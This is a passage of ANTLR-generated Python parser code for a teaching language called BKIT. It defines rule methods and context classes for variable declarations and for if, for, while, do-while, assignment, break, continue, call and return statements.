self.enterOuterAlt(localctx, 1)\n self.state = 172\n self.match(BKITParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_non_init\" ):\n return visitor.visitVar_non_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_non_init)\n try:\n self.state = 183\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 174\n self.match(BKITParser.ID)\n self.state = 178 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 175\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 176\n self.match(BKITParser.INT_LIT)\n self.state = 177\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 180 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 182\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def composite_var(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_varContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_varContext,i)\n\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_var\" ):\n return visitor.visitComposite_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 185\n self.match(BKITParser.ID)\n self.state = 193 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 186\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 189\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.state = 187\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 188\n self.expr()\n pass\n\n\n self.state = 191\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 195 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_init\" ):\n return visitor.visitVar_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 206\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,17,self._ctx)\n if la_ == 1:\n self.state = 197\n self.match(BKITParser.ID)\n self.state = 201 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 198\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 199\n self.match(BKITParser.INT_LIT)\n self.state = 200\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 203 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 205\n self.scalar_var()\n pass\n\n\n self.state = 208\n self.match(BKITParser.ASSIGN)\n self.state = 211\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 209\n self.composite_data()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 210\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_init\" ):\n return visitor.visitComposite_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 213\n self.composite_var()\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_init\" ):\n return visitor.visitPrimitive_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.scalar_var()\n self.state = 218\n self.match(BKITParser.ASSIGN)\n self.state = 219\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitParams_list\" ):\n return visitor.visitParams_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 221\n self.var_non_init()\n self.state = 226\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 222\n self.match(BKITParser.COMMA)\n self.state = 223\n self.var_non_init()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt_list\" ):\n return visitor.visitStmt_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 234\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 229\n self.var_declare_stmt()\n self.state = 230\n self.match(BKITParser.SEMI)\n self.state = 236\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 240\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 237\n self.stmt() \n self.state = 242\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_stmt)\n try:\n self.state = 262\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 243\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 244\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 245\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 246\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 247\n self.assign_stmt()\n self.state = 248\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 250\n self.break_stmt()\n self.state = 251\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 253\n self.continue_stmt()\n self.state = 254\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 256\n self.call_stmt()\n self.state = 257\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 259\n self.return_stmt()\n self.state = 260\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIf_stmt\" ):\n return visitor.visitIf_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 264\n self.match(BKITParser.IF)\n self.state = 265\n self.expr()\n self.state = 266\n self.match(BKITParser.THEN)\n self.state = 267\n self.stmt_list()\n self.state = 275\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 268\n self.match(BKITParser.ELSEIF)\n self.state = 269\n self.expr()\n self.state = 270\n self.match(BKITParser.THEN)\n self.state = 271\n self.stmt_list()\n self.state = 277\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 280\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 278\n self.match(BKITParser.ELSE)\n self.state = 279\n self.stmt_list()\n\n\n self.state = 282\n self.match(BKITParser.ENDIF)\n self.state = 283\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare_stmt\" ):\n return visitor.visitVar_declare_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 285\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def init_for(self):\n return self.getTypedRuleContext(BKITParser.Init_forContext,0)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def con_for(self):\n return self.getTypedRuleContext(BKITParser.Con_forContext,0)\n\n\n def update_for(self):\n return self.getTypedRuleContext(BKITParser.Update_forContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFor_stmt\" ):\n return visitor.visitFor_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n self.match(BKITParser.FOR)\n self.state = 288\n self.match(BKITParser.LEFT_PAREN)\n self.state = 289\n self.init_for()\n self.state = 290\n self.match(BKITParser.COMMA)\n self.state = 291\n self.con_for()\n self.state = 292\n self.match(BKITParser.COMMA)\n self.state = 293\n self.update_for()\n self.state = 294\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 295\n self.match(BKITParser.DO)\n self.state = 296\n self.stmt_list()\n self.state = 297\n self.match(BKITParser.ENDFOR)\n self.state = 298\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitWhile_stmt\" ):\n return visitor.visitWhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 300\n self.match(BKITParser.WHILE)\n self.state = 301\n self.expr()\n self.state = 302\n self.match(BKITParser.DO)\n self.state = 303\n self.stmt_list()\n self.state = 304\n self.match(BKITParser.ENDWHILE)\n self.state = 305\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitDowhile_stmt\" ):\n return visitor.visitDowhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 307\n self.match(BKITParser.DO)\n self.state = 308\n self.stmt_list()\n self.state = 309\n self.match(BKITParser.WHILE)\n self.state = 310\n self.expr()\n self.state = 311\n self.match(BKITParser.ENDDO)\n self.state = 312\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,25,self._ctx)\n if la_ == 1:\n self.state = 314\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 315\n self.scalar_var()\n pass\n\n\n self.state = 318\n self.match(BKITParser.ASSIGN)\n\n self.state = 319\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitBreak_stmt\" ):\n return visitor.visitBreak_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitContinue_stmt\" ):\n return visitor.visitContinue_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 323\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 325\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitReturn_stmt\" ):\n return visitor.visitReturn_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 327\n self.match(BKITParser.RETURN)\n self.state = 329\n self._errHandler.sync(self)\n _la = 